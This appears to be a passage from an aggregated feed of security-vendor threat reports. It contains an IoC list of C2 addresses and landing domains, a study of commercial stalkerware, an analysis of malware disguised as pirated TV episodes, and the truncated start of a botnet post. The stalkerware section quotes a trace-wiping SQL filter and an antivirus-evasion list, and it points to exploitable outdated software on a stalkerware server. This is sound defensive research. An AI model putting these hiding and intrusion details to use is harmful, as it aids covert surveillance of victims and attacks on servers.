    Indicators of compromise (IoCs) examples Malicious hosts: 114.43.155[.]227 real C2 220.136.47[.]169 real C2 220.136.49[.]137 real C2 220.136.39[.]1 real C2 118.168.130[.]236 real C2 171.244.33[.]114 RogueDNS 171.244.33[.]116 RogueDNS 61.230.153[.]211 Landing page 154.223.62[.]130 Landing page ffakecg[.]com Landing page sagawa-mwm[.]com Landing page sagawa-mqd[.]com Landing page sagawa-bz[.]com Landing page nttdocomo-qae[.]com Landing page nttdocomo-qat[.]com Landing page Suspicious Twitter accounts:
    • luckyone1232
    • sadwqewqeqw
    • gyugyu87418490
    • lucky88755
    • lucky98745
    • lucky876543
    sagawa.apk Type A and its modules: 417a6af1172042986f602cc0e2e681dc APK file 651b6888b3f419fc1aac535921535324 APK file 0a4e8d3fe5ee383ba3a22d0f00670ce3 APK file 870697ddb36a8f205478c2338d7e6bc7 APK file 7e247800b95c643a3c9d4a320b12726b \classes.dex 7cfb9ed812e0250bfcb4022c567771ec \classes.dex 8358d2a39d412edbd1cf662e0d8a9f19 \classes.dex 7cfb9ed812e0250bfcb4022c567771ec \classes.dex af2890a472b85d473faee501337564a9 Decrypted dex file c8d7475a27fb7d669ec3787fe3e9c031 Decrypted dex file d0848d71a14e0f07c6e64bf84c30ee39 Decrypted dex file e2b557721902bc97382d268f1785e085 Decrypted dex file

Beware of stalkerware

3 Duben, 2019 - 12:00

Spyware might sound like a concept from a Hollywood movie, yet commercial versions of such programs – known in the cybersecurity industry as ‘stalkerware’ – are a daily reality for many people. For the price of just a few dollars, consumer spyware programs allow users to spy on their current or former partners, and even strangers. This can be done by simply installing an app on the targeted victim’s smartphone or tablet. Once this has happened, the stalker is granted access to a range of personal data: from the victim’s location and SMS, to social media messages and live feeds from their device camera or microphone.

From observing stalkerware program functionality, it can be seen that there are very few differences between commercial spyware (detected and defined by most security software as ‘not-a-virus’) and classic spying malware. For example, a consumer surveillance program works like this:

  • The command and control server (C2) is provided by the service owners
  • It is easy to buy and deploy than spying malware. There is no need to use shady hacking forums and have programming skills – in almost all cases it requires a simple manual installation

Stalkerware programs have been exposed and publicly criticized multiple times, yet in most countries their status remains vague, while some brands market their programs as child-tracking software. However these programs should not be confused with legal parental control software and ‘find my phone’ apps, despite an overlap in functionality. Firstly, they are distributed through dedicated landing pages – a direct violation of Google Play safety recommendations. Secondly, these apps have functionality that allows them to invade the privacy of an individual without their consent or knowledge: the application icon can be hidden from the applications menu, while the app continues to run in the background, and some functions of the app fulfil surveillance tasks (such as recording the victim’s voice). Some even delete traces of their presence from the phone, along with any installed security solutions once the attacker manually grants the application with root-access.

We detect such programs as ‘not-a-virus:Monitor’ and have been keeping a close eye on them. Two years ago, we published our first overview and continued to monitor such threats. We have now decided to conduct further research to check how stalkerware is being used and determine the most prominent features of the latest consumer surveillance programs.

We examined applications for mobile platforms, with a particular focus on Android, because it is the most popular OS that stalkerware is implemented on. For attackers to perform extended exfiltration activities on iOS devices, the devices need to be jailbroken first.

All in all, 2018 saw 58,487 users who had a stalkerware application installed on their phones or tablets. That is a moderate number compared to other types of threats. For example, during the same period, the number of users who encountered ransomware was 187,321. However, it should be noted that when it comes to malware, our figures show how many people we were able to protect from infection. But when we look at stalkerware, the situation is a bit different.

Out of the 58,487 on whose devices we detected stalkerware apps, approximately 35,000 had these apps installed on their devices before they implemented Kaspersky Lab products and the first security scan was performed. This could mean they were unaware of presence of such software on their device.

In total, in 2018 we identified 26,619 unique samples of stalkerware programs.

The following statistics reveal the most detected stalkerware applications based on the number of unique users of Kaspersky Lab for Android mobile products:

The most often detected stalkerware apps by the number of targeted users, 2018

Apart from these applications, we have also chosen a number of other programs that we’ve been monitoring manually for a while.

After having them analyzed, we found some important features that, when put together, paint a clear picture of how stalkerware is now used, and we have listed six reasons to stay as far away from these applications as possible.

Their distribution methods pose a threat

Due to their aggressive nature, stalkerware programs can’t be found or listed in the App Store or on Google Play. In most cases, however, they can be found after a quick internet search, and downloaded from dedicated landing pages. Of course, these programs are urging users to enable the installation of applications hosted outside of Google Play, which can often put devices at risk. Enabling applications that cannot be found on Google Play makes an Android device vulnerable to malware and goes against Google’s security policies.

The programs are being advertised through online banners. Cybercriminals also use ‘Black Hat SEO‘ techniques, to ensure the website supporting the program is moved up the search engine ranking and appears at the top of search results pages.

The main ‘infection’ vector of stalkerware applications is manual installation, since the attacker needs to register a device after installation by entering license credentials. After this quick configuration process, the stalkerware program is ready to spy on the attacker’s target, and its presence is hidden on the device. This is the case with Mobile Tracker Free:

Moreover, some programs apply additional measures to prevent possible detection by the victim. For example, by masking itself as a system service in the installed applications list:

This masking feature is common behavior among typical Android threats. In special, more secretive cases, stalkerware applications cover up all their tracks. Upon installation, such an application removes the downloaded installer file and clears the browser history, such as the specific web pages related to the program’s distribution. These code chunks illustrate how it works in FreeAndroidSpy stalkerware:

Cleaning up the ‘downloads’ directory

Removing the browser history

The full SQL query used for browser history removing:

url like \’%freeandroidspy.com%\’ or url like \’%spysetup.com%\’ or url like \’%spysetup.co%\’ or url like \’%ytubecache.com%\’ or url like \’%my.spysetup.com%\’

It filters history entries by the specific web pages used to download the FreeAndroidSpy stalkerware installer.

You never know which one is actually on a device

Spyware has established itself as a popular product, and some have become part of different distribution schemes. They might differ by name or the website they can be found on, but they are actually the same product. This is an important point, related to many stalkerware products. There are special programs that allow third-parties to buy franchises and to distribute the product under their own brands, like this one – iSpyoo:

Screenshot from the iSpyoo official site

As a result, we’ve detected a number of iSpyoo samples that are technically the same. Here are two examples of ones we’ve examined: Copy9 (8ac6209894fff56cf2a83f56408e177d) and TheTruthSpy (a20911f85741ed0f96cb4b075b7a32c1).

Both were signed with certificates that have the same issuer/subject:

But further analysis shows the only – but big – difference: they have different C2 server addresses in the same code.

So technically this is the same stalkerware application, but packaged as different products with their own websites, names, marketing strategies and C2 servers.

Both versions of this application has the same user interface:

Obviously, such products have the same server-side part, and this is crucial. If a cyberattacker discovers an exploitable vulnerability in the C2 server of one product, all the other products will be at risk of exposing data as well.

Rather predictably, both TheTruthSpy and Copy9 were hacked in 2018.

Photographs, SMS, WhatsApp chats, call recordings, contacts, and the browser history of thousands of stalkerware victims were leaked to third-parties.

Trusting these applications with your partner’s data puts it at risk of exposure

This brings us on to another important point. As is the case with many spyware programs, they don’t just invade an individual’s privacy, they also store an overwhelming amount of sensitive personal data (in some cases, all of a person’s digitalized personal data) with poor security and a high risk of exposure.

As mentioned above, such programs came to our attention a while ago, and we conducted major research on them in 2017. Back then, we discovered that many had significant security flaws. In particular, we found a critical directory listing vulnerability in SpyMaster Pro:

An incorrect C2 server configuration provided anyone with full access to the victim’s stolen data. Although this vulnerability is now fixed, it comes as no surprise that hackers became very interested this kind of service.

In fact, the past 12 months have shown that there are a lot of known stalkerware product data breaches. For example, there was the MSpy application breach which leaked millions of sensitive records, and not for the first time.

Other widely discussed application data breach cases include the hacking of FlexiSpy, one of the most expensive ($68 per month) programs on the market, and Mobile Spy by Retina-X, which was first breached in 2017 and then again in 2018, with the data shared with Motherboard magazine. This contained intercepted text messages indicating that the program was being used to spy non-consensually on some victims.

Note on Mobile Spy official site

Overall, we found that five out of the 10 most popular stalkerware program families had poor security or had leaked a tremendous amount of personal data due to breaches.

Their infrastructure is questionable to say the least

These breaches were not accidental and begin from security issues in the stalkerware infrastructure. Unfortunately, according to our statistics, there are a lot of C2 servers that contain critical security vulnerabilities that can be exploited by attackers to expose users’ sensitive information.

Besides the critical directory listing vulnerability that we described in a previous publication, we also examined Talklog – a Russian-speaking product.

It’s easy to determine the C2 server address since it is hardcoded into the sample code:

The following directory is forbidden for listing:

But with simple crawling we could find a phpMyAdmin service here – /myadmin:

Its documentation path is available as well, so we could determine the current version of the service:

This is a very outdated version, the current version of phpMyAdmin at the time of our research is 4.8.5.

A simple search in the Offensive Security Exploit Database reveals multiple exploits that could be used to harm or even take control of the C2 server:

Another service that we easily found is SquirrelMail, here – /webmail:

As shown on the login form, it’s version 1.4.23, which, according to the exploit database, seems vulnerable to the Remote Code Execution exploit as well:

This top level analysis, without serious penetration testing procedures, already reveals major security issues within the stalkerware app server that could be exploited by potential attackers and expose the sensitive information of all victims.

You never really know where they come from

Another trait of many stalkerware services is their unknown origins. In the majority of cases, these are far from transparent, to say the least. We don’t know where they come from, who is behind them, who develops these programs and which legislation should be applied to them.

Let’s take MobileTool as a prime example of this. Even though there is a mention of “ltd. OEME-R Technology, Israel” in its company details on its official site, there are a couple of clues that point to the original roots of the service.

Company details

  • The official site is available only in Russian
  • The EULA from the official site contains a mention of “Minsk” – the capital of Belarus
  • Contact information contains a telephone number that is easily attributed to the Velcom operator – a Belarus telephone provider

That number is also linked to a person who tried to sell a house located in Brest on a Belarus property website:

Fun fact: according to the webpage of this application on 4pda.ru, it’s unavailable in Belarus, even though that is the suspected country of origin for the application.

Warning! The service is not available in Belarus! Do not try to avoid this restriction. You will just lose your money.

So, it looks like the developers wanted to avoid some local law with that restriction.

Another example of a program with a suspicious origin is the Spy Phone App. It is registered in Pervolia, Larnaca, Cyprus, an area that has offshore policies and flexible legislation for registered businesses, as well as secrecy laws that protect people’s identities, lenient financial reporting standards and very low taxes.

Their self-protection mechanisms are too aggressive

Even though stalkerware is detected as not-a-virus, these applications have rather aggressive self-protection policies. During our research we observed different self-protection/hiding techniques (some of which have been mentioned above). One of the most notable belongs to the Reptilicus stalkerware application. When it is first launched, it scans all the installed applications and matches them with its hardcoded list:

As we can see, this list contains dozens of names of mobile antivirus products which could detect and remove stalkerware products as they would register as harmful applications. For example, according to VirusTotal, this sample of Reptilicus is detected by 20/59 vendors presented on the service:

If this stalkerware finds an installed antivirus product from this list, a special message will be shown to the user with a request to delete the antivirus product or to whitelist the Reptilicus application:

Conflict applications found, remove it or put application to exclusion list. If you do not do this, our application may work intermittently. Found conflicting applications: Their installation manuals make you not only a stalker but also a cyberfraudster

Another notable trait of almost all stalkerware products is an installation manual that violates many security policies. The Mobile Tracker Free official website has this kind of installation guide and it includes some alarming recommendations.

According to this guide, you must:

  • Enable installations from unknown sources on your phone if you haven’t already done so. “Check the box ‘Unknown sources’. Accept the warning by clicking ‘OK’.”
  • Allow the installation of unknown applications to a mobile browser.
  • Disable Google Play Protect. “Google has added a security system for apps that are not downloaded from Google Play called ‘Play Protect’. It is possible that the Mobile Tracker Free application is detected as potentially dangerous. To prevent the app from being uninstalled, you must disable Google Play Protect and disable notifications related to Google Play Protect.”

This is probably the most horrible mobile security guide that could be presented to a user, as all these steps put a device at risk of being infected by any malware or not-a-virus threats in the future. Moreover, and this is probably the most crucial point here, this guide does not include steps to revert the settings to their original state after installation, so the device on which this software is installed will remain vulnerable.

Their industry has gone way too far

What surprised us most in this research is that, apart from the programs being so easy to find online, they are extremely bold in their promotion and distribution. Forget Darkweb forums or underground markets, developers of these applications have built their own economic environment. They provide different offers for different needs, with tariffs ranging from half a dollar per day to $68/month. Some of them even have their own Twitter account and blogs that are being constantly updated and are apparently managed by dedicated social media managers. The most outrageous programs continue to exist, including the infamous FlexiSpy, described by many as a data-breach catastrophe. In fact, when we researched it, we found a well-kept company blog that was presenting software updates and new features that could be accessed by anyone; along with an active Twitter account.

Moreover, some stalkerware companies are being so open about their practices, that they have an option of delivering a phone with a program pre-installed to the buyer – specifically for those who can’t install the application manually because they lack the technical skills required. This provides the people who run the program with the opportunity to collect information on how skilled their customers are. The Reptilicus app is one of them. According to its official website, this company offers not only a stalkerware application, but an already backdoored phone.

According to statistics from 100% of our users, only 60% can independently configure the device to work properly. If you have any difficulties, or you just have no time to do this, we will do everything ourselves and send you a phone with the installed program.

As the whole stalkerware industry is growing year by year, it has spawned internal competition in an unregulated free-market economy. For example, this is the blogpost about iSpyoo stalkerware published by its competitor – Mspy:


The companies also have a whole mechanism to create fake reviews. This has been done by the Hoverwatch stalkerware service:


There is no need to prove the negative effects that commercial spyware brings, as its initial concept is completely unethical. However, there are many layers of other threats that these programs bring to a user who installs them. They breach the legislation of mobile application stores, breach security and make the data of stalked victims vulnerable to hacker exploitation. Later, that data can be used in all kind of malicious activities – from financial extortion to identity theft. We can also safely say that there are people who benefit from this and can access this data, while their own identities, origins and location remain unknown.

Despite all the findings listed above, most cybersecurity vendors still don’t detect commercial spyware as a threat due to vague legal positioning on commercial surveillance.

However, starting from April 3, 2019, Kaspersky Lab will be notifying its Android users of such programs’ existence on their devices, with a special feature implemented in our Android security app.

All mentioned stalkerware products Name Sample MD5 Official site iOS version MobileTool 7229d6c4ddb571fb59c1402636c962c2 hxxps://mtoolapp[.]net/
hxxps://mobiletool[.]ru/ – iSpyoo 8ac6209894fff56cf2a83f56408e177d (copy9)
a20911f85741ed0f96cb4b075b7a32c1 (thetruthspy) hxxps://ispyoo[.]com/
hxxp://thetruthspy[.]com/ + Talklog 5b20dace9cc15afc9a79332e4377adc2 hxxps://talklog[.]net/ – Spy Phone App bf090ca25d27d2e11dfe64cf0f7b645a hxxps://www.spy-phone-app[.]com/
hxxps://easyphonetrack[.]com/ + Reptilicus 9be7585e88c3697d1689fdd1456c2a52 hxxps://reptilicus[.]net/ + Mobile Tracker Free 847c5f78de89ed4850e705a97a323a1a hxxps://mobile-tracker-free[.]com/ – Hoverwatch 9559138aee33650d10f0810fdeb44b3e hxxps://www.hoverspyapp[.]com/ – Mobile Spy 62bc31db17343049ba70d0f8c9be0ba8 hxxp://www.mobile-spy[.]com/ – FlexiSpy 8514c499f825ca5682a548081c2e6c61 hxxp://www.flexispyapp[.]com + MSpy dee7466c8b58b2687bb003226ac96e6b hxxps://www.mspy[.]com/ + FreeAndroidSpy 1cb261cd82677124e6adac17a59707aa hxxp://freeandroidspy[.]com/ –

Game of Threats

1 Duben, 2019 - 12:00


While the way we consume TV content is rapidly changing, the content itself remains in high demand, and users resort to any means available to get at it – including illegal and non-ethical ones like the use of pirated stuff. The world is embracing the idea of paying for entertainment more and more with the development of paid subscription networks like Netflix or Apple Music. Yet many countries are still fighting the battle against illegally distributed content. In December 2018, Australia’s Federal Court issued an injunction requiring local internet providers to block 181 pirate domains linked to 78 websites full of files infringing copyright regulations. At the beginning of 2019, Brazil’s Ministry of Justice brought on board the Federal Police of Brazil (Polícia Federal) to launch an anti-piracy operation targeting the illegal distribution of music, movies and TV shows. These are just two of the many initiatives introduced both by governments and the private sector all over the world to combat the problem.

However, despite these measures, copyright-infringing content is still readily available. According to the latest Annual Piracy Report by Muso – a global technology company providing anti-piracy, market analytics and audience connection solutions – the numbers of pirated content consumers are growing. The company registered more than 300 billion visits to pirate websites in 2017 alone. An 1.6% increase from 2016 and an international trend: the US supplied the greatest number of pirate website visitors with 27.9 billion visits per year, followed by Russia, 20.6 billion (a 46% increase from 2016), and India, whose residents visited pirate websites 17 billion times. A major share of pirated content still comes from downloadable files: a 2019 WebKontrol report claims that torrent websites are still leading in Russia in terms of volume of pirated content, followed by file-hosting and streaming services. Moreover, the share of links to illegal content posted on torrent websites grew 14% from 2018 (38% from 24%), overtaking streaming websites.

Being a lucrative source of content, torrents also prove to be a popular way of distributing malicious code, and there are many studies on how cybercriminals exploit that opportunity. According to the results of one such study published in 2015, bootlegged content represents 35% of files shared via BitTorrent, with more than 99% of the analyzed counterfeit files linked to either malware or scam websites. The recent findings by Kaspersky Lab and independent researchers have confirmed the continuation of this trend.

But what kind of content is being targeted? Originally, torrent trackers were the ‘go-to’ places for those seeking pirated versions of games and other software, as well as recent Hollywood blockbusters. Yet in recent years TV shows have become an extremely popular type of content among viewers all around the world – sometimes even more popular than Hollywood movies. According to the Muso report, TV content is clearly of interest to one third of all users consuming copyright-infringing content: TV shows remain the most popular product among users with 106.9 billion visits last year, followed by music (73.9 billion) and films (53.2 billion).

Such popularity has not escaped the eye of cybercriminals, either. To find out exactly how they capitalize on the rise in illegal downloads of TV content, we have researched the landscape of malware threats disguised as new episodes of popular TV shows distributed through torrent websites. Our goal was to see which TV series were the most popular with the malware pushers and to take a closer look at what kind of threats are distributed that way.

Methodology and key findings

To make sure the TV series we focused on were high in demand and sufficiently relevant, we made a list of the most popular TV shows in 2018 using various public sources like IMDB, Rotten Tomatoes and other online ratings sources, plus the most pirated TV shows, also suggesting how popular a particular show may be. We listed a total of 45 titles, but as some of the more popular ones appeared in several different rankings at the same time, we made a few revisions and came up with a final list of 31 TV shows (according to various public ratings like IMDB, Rotten Tomatoes, TorrentFreak, etc., in an alphabetic order).

  1. Altered Carbon
  2. American Horror Story
  3. Arrow
  4. Better Call Saul
  5. Daredevil
  6. DC’s Legends of Tomorrow
  7. Doctor Who
  8. Game of Thrones
  9. Grey’s Anatomy
  10. Homeland
  11. House of Cards
  12. Killing Eve
  13. Legends of Tomorrow
  14. Modern Family
  15. Roseanna
  16. Sharp Objects
  17. Stranger Things
  18. Suits
  19. Supernatural
  20. The Big Bang Theory
  21. The Flash
  22. The Good Doctor
  23. The Good Place
  24. The Handmaid’s Tale
  25. The Haunting of Hill House
  26. The Walking Dead
  27. The X-files
  28. This Is Us
  29. Vikings
  30. Westworld
  31. Young Sheldon

We then ran each title against our threat database. Using aggregated threat statistics from the Kaspersky Security Network (KSN) – the infrastructure dedicated to processing cybersecurity-related data streams from millions of volonteers around the world – we checked whether the users who had agreed to share threat statistics with KSN had ever encountered malware when dealing with the corresponding TV show titles.

Next, we identified the episodes of the most popular TV shows used to diguise malware to find out whether there was any correlation between the number and order of episodes in any given season and the malware pushers’ interest in them.

In addition, we estimated how effective each disguise was, and how succesful a bait each TV show was, as well as the overall potential of the setup as a source of spreading malware. To do that, we divided the total number of unique attacked users by the number of malicious files, and did the same for each TV series. This gave us the average number of users reached by at least one TV show-themed malicious file which, to some extent, allowed us to get at the TV show that worked best as a decoy.

Finally, we looked at what kind of threats are more likely to hit users under the cover of popular series.

These are our key findings:

  • The total number of users who encountered by TV-show-related malware in 2018 is 126,340 globally, one-third less than in 2017. The number of attacks by such malware has seen a decrease of 22% to 451,636 registered attempts
  • The top three TV shows most often used for bait and used to attack the greatest number of users: Game of Thrones, The Walking Dead and Arrow
  • Game of Thrones accounted for 17% of all the infected pirated content in 2018, with 20,934 users attacked, despite being the only TV show in the list that didn’t have new episodes released in 2018
  • The first and the last episodes of each Game of Thrones season we analyzed turned out the most dangerous, accounting for the greatest number of malicious files in Kaspersky Lab’s collection and affecting the most users
  • Winter Is Coming‘ – the very first episode of the show – was the one most actively used by cybercriminals
  • Within two years we detected 33 types and 505 different families of threats hiding behind the Game of Thrones title
  • On average, 2.23 users were attacked seven times per each malware file guised as a TV show
  • American Horror Story proved to be the most effective malware cover – each malicious file hidden behind the title has reached an average of three users
  • Not-a-virus:Downloader and Not-a-virus:AdWare turned out to be two of the most popular threats delivered via TV show content, the most popular one being the dangerous malware type called Trojan
General Overview: malware is coming

The analysis of malicious payloads guised as popular TV series names, and a comparison between the results for years 2017 and 2018, has demonstrated a decrease in the numbers of such malware files, attacks and affected users.

A total of 126,340 users were attacked – one third less than in 2017 (188,769). The decline is smaller than that seen elsewhere For example, a recent report showed that users affected by malware delivered via popular content, including porn, fell by 45% in 2018.

Same as user count, the malware count also declined: in 2017, which was rich for malware, we added 82,091 samples to our database, yet in 2018 that number dropped 30% to 57,133.

Torrent website offering all sorts of pirated content

The total number of attacks detected by our security solutions also dropped, but only by 22%, down to 451,636.

Such a decline might be connected to some of this year’s events potentially affecting the number of torrent file downloads. First, in 2018, Google downranked more than 65,000 torrent websites – major distributors of pirated TV shows – leaving great many users unable to find them when looking for TV series downloads. Active action against torrent websites does make a difference, more and more of them finding themselves blocked or troubled. For example, two major torrent trackers (Pirate Bay and Demonoid) have of late suffered functionality collapses, and one of the world’s longest-standing ones, Leechers Paradise, was shut down for good.

In response, websites streaming pirated copies of movies and TV series are becoming more and more popular, draining the audience from the torrents.

Yet torrents are still running high and – based on our statistics – attempts to harm users are still registered. To measure how effective such malware is, we compared the overall number of unique users attacked with the number of malicious files detected. By dividing the number of users by the number of files we found that every TV show malware file has infected an average of 2.23 users in 2018.

Additionally, we compared the list of the most popular torrents in 2018 with the list of the most infected TV series.

The most popular TV show torrents Top TV shows used to cover up malware The Walking Dead Game of Thrones The Flash The Walking Dead The Big Bang Theory Arrow Vikings Suits Titans Vikings Arrow The Big Bang Theory Supernatural Supernatural Westworld Grey’s Anatomy DC’s Legends of Tomorrow This Is Us Suits The Good Doctor

The most popular torrents of 2018 as reported by TorrentFreak versus the most popular malware-decoy TV series titles

As seen from the table above, six out of 10 TV series are featured on both lists, which we would expect: the more popular a TV show is, the more likely it is to be used by cybercriminals. At the same time, several shows that had been heavily promoted by their makers and were considered to be at the top in terms of popularity – Westworld, DC’s Legends of Tomorrow and a few more – didn’t make it to the top of disguised infections. This, in a way, may reflect the real popularity of these titles.

The M-files: most often infected series

Of course, some TV series are more popular among cybercriminals than others – and threat statistics proves that. To understand which of them attract threat actors the most, we reviewed the number of malware files hidden behind the popular TV show title, the number of times they have attacked users and the number of users affected by such attacks. The leaders turned out to be Game of Thrones, The Walking Dead, Arrow, Suits, Vikings, The Big Bang Theory, Supernatural, Grey’s Anatomy, This Is Us, and The Good Doctor. The latter has replaced House of Cards, which rounded out the top 10 in 2017.

‘Malicious files’ represents the number of unique samples of malware encountered by our users; ‘Attacks’ stands for the number of times our security solutions reported detects, and ‘Users attacked’ means users attacked by TV-series-related malware at least once.

Top 10 TV shows used as a disguise for malware in 2018

Of all the TV series analysed, Game of Thrones had the greatest number of users attacked by malware of the same name – 20,934. It tried to infect users 129,819 times, and the total number of Game of Thrones-themed malware files in our threat collection is 9,986. This makes the show an unmatched leader in popularity not just among users but also among cybercriminals looking for the most effective way to distribute malware.

A year before, in 2017, the wave of Fire and Ice-themed malware was even bigger with almost twice as many users affected and malware files: 42,330 and 19,180, respectively. The number of attacks in 2017 exceeds the 2018 figure by 22% with 167,691 detects.

Top 10 malware disguised as a TV show by the share of users attacked in 2017

Top 10 malware disguised as a TV show by the share of users attacked in 2018

The second place, both in 2017 and 2018, was occupied by The Walking Dead, with 18,794 users attacked, and the third by Arrow (12,163 users). The gap of 380 between the number of users attacked by malware disguised as The Walking Dead versus Game of Thrones seems insignificant. However, we need to remember that Game of Thrones is the only TV series in the top 10 that was not even broadcast during 2018 – the period for which the statistics were gathered.

For comparison, we looked at a similar rankings in 2017 when all three TV shows were releasing episodes live. As seen from the graph below, the difference between Game of Thrones and The Walking Dead was more pronounced, with the number of users attacked by Game of Thrones malware exceeding The Walking Dead and The Arrow figures by 33% and 50%, respectively.

Top three TV shows used as a disguise for online threats

We also took a closer look at sample episodes from the two latest seasons (six and seven) of Games of Thrones and the original first season. The results revealed that the number of infected files spotted by our protection technologies differed significantly from episode to episode. The common theme we were able to spot was that the first and last episodes were used as a disguise for malware each season. Also, the titles of the opening and closing episodes of each season were used the most actively to hide malware compared to other episodes.

Game of Thrones episodes: number of infected files and unique users attacked in seasons 1, 6 and 7

Due to huge time and resource requirements for such an analysis, we did not do any other series. But based on what we have on these three different seasons of GoT, an assumption that other series would be exploited in much the same way would be a safe bet.

But what we can’t assume is that, while the malware disguise reached a significant number of users, it is the most effective method of distribution. As we mentioned earlier, malware files disguised to appear as TV show episodes (no matter which) have hit an average of 2.23 users in 2018. Out of the top 10 TV shows used for cyberattacks, Game of Thrones was only seventh in terms of the proportion of malicious files to the number of affected users. Moreover, it proved to be less effective as an average bait, there being one malicious file disguised as Game of Thrones per every 2.1 users attacked.

We looked at the files to users ratio when analyzing each TV series from the top 10. The files named after The Walking Dead proved to be the most successful, with 2.69 users attacked on average. Second place went to Grey’s Anatomy with 2.65, and third to Supernatural with 2.34.

Later we also checked the remaining TV shows that were analyzed by us but did not make it to the top 10.

Surprisingly, it turned out that the most successful and productive files were hiding behind TV shows that did not make it to the top 10. Each malicious file of the American Horror Story blood line has reached an average of three users in 2018, lifting itself from the fourth place in the 2017 ratings. Back then the top three most effective malware files pretending to be TV shows looked different. Modern Family occupied the third position with 2.95, and Grey’s Anatomy was second with three. Each file of the Big Bang Theory line was able to reach 3.15 users and was topping the list, yet in 2018 it dramatically fell to the eighth position.

Average number of users dealing with TV series-disguised malware files in 2017

Average number of users dealing with TV series-disguised malware files in 2018

Threat Anatomy: attack vectors and types of threats

To investigate what type of TV show-disguised threats are more likely to infect the users’ computers, we extracted infected samples of the most popular TV shows in 2017 and 2018 and counted the different types and families of threats.

We detected a total of 33 threat types and 505 different families hiding behind the Game of Thrones TV show title. The top three most popular threat categories among these were: Trojan, accounting for almost one third of all threats; not-a-virus:Downloader with 21%; and not-a-virus:AdWare with 28%. The ‘not-a-virus’ type of threats are usually not classified as malware, yet such programs may interfere with users’ sessions causing unwanted actions to be performed. AdWare, for instance, can show unsolicited ads, alter search results and collect user data to deliver targeted, contextual advertising.

Top 10 most popular malware types by the share of unique users attacked in 2017-2018

Top 10 most popular malware families by the share of unique users attacked in 2017-2018

As we looked at the statistics of threat types and threat families, we realized that the top-three most popular families represented the three most popular types of threats.

The most widespread threat: Trojans

According to the statistics, the most common type of threat was Trojan. And in 17% of all cases pirated TV shows users had to deal with worms of the Trojan.WinLNK.Agent family. A Trojan is a dangerous type of malware able to cause much harm, from information theft to gaining control of the infected system. The Trojan family pretending to be Game of Thrones that most actively attacked users usually looks like a shortcut to the file and is distributed very differently – usually through emails or questionable websites.

Example of a Trojan disguised as a TV show downloaded to a PC

The common scenario is this: the user downloads a torrent file or receives an archive with a shortcut by email. At first glance the package contains a copy of the long-awaited episode.

Yet, apart from the shortcut, the archive will also contain a hidden folder with the ‘system’ attribute on, making it invisible even if Windows Explorer is configured to display hidden files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

By clicking on the shortcut in hope to watch the video, the user will launch the AutoIt script sitting in the hidden folder along with its interpreter and several other .lnk files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

AutoIt is a worm that spreads through removable disks and runs a backdoor, which is then added to autorun (writing paths to the .lnk files from the hidden folder) and used to accomplish the following actions:

  1. Display a specified message
  2. Execute commands in cmd.exe
  3. Download and launch to% Temp% files
  4. Shutdown/restart computer
  5. Go to a specified URL
  6. Auto-click various webpage items
  7. Terminate, restart, update itself
Not-a-virus rounds up the top three

The second and third place in the rating list of the most popular types of threats and their families are occupied by the not-a-virus families, also known as potentially unwanted software: adware and downloaders.

One of the most popular threat families is not-a-virus:AdWare.Win32.FileTour. Kaspersky Lab classifies it as a type of AdWare. While technically AdWare may represent legitimate software, in many cases users have to deal with file partner programs trying to install partner software and sometimes also download malware to their computers. Unlike not-a-viruses, these threats can vary in type and include malicious miners, password stealers, banking Trojans, and so forth. This happens because the owners of file partner programs often neither know, nor want to check what kind of software they distribute.

Just like not-a-virus:Downloader – another popular not-a-virus threat we will be describing in more detail later – it is distributed through download portals, yet unlike Downloaders it can also be spread through torrent trackers.

Example of an internet page on a PC with adware installed.

Another distinguishing feature of adware compared to the relatively innocent not-a-virus:Downloader is the use of more aggressive strategies. AdWare can trick its way into the users’ devices and play dirty, for instance, by disguising executable files (.exe files) as media (for example, The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe).

Example of an internet page on a PC with adware installed.

The third place is held by the not-a-virus:Downloader threat. This threat type can be completely innocent yet annoying as it will attempt to download utilities. Positioned as software made to simplify downloading files from the internet, the threat is used to distribute the leading malware family hiding behind the Game of Thrones title – MediaGet (we put it in the not-a-virus family: Downloader.Win32.MediaGet) – as well as many others such as uBar, AppDater, etc.

The typical not-a-virus:Downloader distribution scheme is quite simple – the user visits a website in search for a TV show or another media file and sees many different ‘download’ buttons.

Example of a hidden download agreement in not-a-virus:Downloader.

It is very difficult to figure out which one leads to the desired TV episode, so the user often ignores or misses the information displayed like ‘download using the download manager’.

As a result, instead of the video the user gets nothing but a utility-loader through which the content can be potentially downloaded.

Example of a not-a-virus:Downloader.

Downloader utilities themselves are usually quite harmless, yet they are trying to cement themselves firmly into the system and may show unwanted ads or suggest additional unwanted software. This is not dangerous but rather annoying.

Danger Things: how to stay safe

As the world tightens up policies regarding pirated content and treats intellectual property more like physical property, malware distributors seem to be leaving file hosting and torrent websites. But, as we said earlier, this might be due to increased popularity of streaming websites that do not require files to be downloaded, yet might be a source of different threats.

At the same time, we’ve seen that the number of users faced with TV-series-themed malware is still quite large and this threat is proving problematic to those who are looking for free content on the internet. Especially when it comes to extremely popular shows like Game of Thrones, The Walking Dead, Arrow and others. Game of Thrones deserves a special mention as it was one of the very few series which had no new episodes out last year but still topped the malware charts, according to Kaspersky Lab telemetry.

That said, it won’t come as a big surprise to see a new wave of malicious activity accompanying the release of the final season of Game of Thrones in April 2019.

The best way to avoid falling victim of any hostile tactics and make sure you are not hit by a Trojan, which will to zombify your PC, but are going to safely enjoy yet another episode of your favorite TV series, is to use only legitimate sources of content. But even if you do follow that rule, stay alerted as it is quite possible to encounter malicious activity accidentally.

To avoid threats coming from untrusted content distributing platforms, we recommend:

  • Pay close attention to website authenticity and do not visit them unless you are sure they are legitimate
  • Always make sure the website is genuine by double-checking the URL format or company name spelling before you download. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference
  • Pay attention to the extension of the downloaded file. If downloading TV show episodes, the file must not end in .exe
  • Be careful about the torrents you use and do look up the comments about the downloadable files. If comments are unrelated to the content, you are probably looking at malware
  • Don’t click on suspicious links promising exclusive early premiere of the latest episodes; consult the TV show schedule and keep track of it
  • Use reliable security solutions for comprehensive protection against a wide range of threats, such as Kaspersky Internet Security

Bots and botnets in 2018

29 Březen, 2019 - 13:00

Due to the wide media coverage of incidents involving Mirai and other specialized botnets, their activities have become largely associated with DDoS attacks. Yet this is merely the tip of the iceberg, and botnets are used widely not only to carry out DDoS attacks, but to steal various user information, including financial data. The attack scenario usually looks as follows:

